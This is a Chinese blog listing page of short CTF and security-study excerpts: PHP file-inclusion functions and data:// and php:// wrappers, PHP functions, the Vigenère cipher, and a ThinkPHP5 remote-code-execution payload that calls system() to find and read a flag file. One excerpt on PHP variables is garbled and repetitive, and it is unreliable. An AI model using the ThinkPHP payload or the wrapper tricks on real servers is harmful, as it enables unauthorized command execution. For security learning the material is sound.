笔记
大漂亮#
这个作者很懒,什么都没留下…
展开
-
文件包含漏洞(一)
1.造成文件包含漏洞的函数通常有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readline 2.data协议 用法: data://text/plain,xxxx(要执行的php代码) data://text/plain;base64,xxxx(base64编码后的数据) 3.php://协议 php://input,用于执行php代码,需要post请原创 2021-01-15 20:12:05 · 207 阅读 · 0 评论 -
php一些函数
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va原创 2021-01-15 18:57:17 · 249 阅读 · 0 评论 -
thinkphp5的漏洞
payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看fla原创 2021-01-15 16:41:42 · 399 阅读 · 0 评论 -
php运行方式
php运行方式 运行php文件 php -f 路径+文件名 或者 php 路径+文件名 (小技巧:windows下面可以把文件直接拖进去,省去cd/命令,或者慢慢拼写完整路径) 两种方法都可以执行命令,如果是.php文件则执行php代码,否则直接以字符串形式读取文件 或者直接用php.exe 或者在cmd下php -a 如果想要在本地测试可以先把文件放入www目录下,登录127.0.0.1/xx.php 以下就是我所了解几种可以运行php的方法 ...原创 2021-01-07 15:08:01 · 388 阅读 · 0 评论 -
维吉尼亚密码
维吉尼亚密码是在凯撒密码基础上产生的一种加密方法,它将凯撒密码的全部25种位移排序为一张表,与原字母序列共同组成26行及26列的字母表。另外,维吉尼亚密码必须有一个密钥,这个密钥由字母组成,最少一个,最多可与明文字母数量相等。维吉尼亚密码加密方法示例如下: 明文:I’ve got it. 密钥:ok 密文:W’fs qcd wd. 首先,密钥长度需要与明文长度相同,如果少于明文长度,则重复拼接直到相同。本例中,明文长度为8个字母(非字母均被忽略),密钥会被程序补全为“okokokok”。现在根据如下维吉尼亚原创 2020-12-29 17:33:53 · 640 阅读 · 0 评论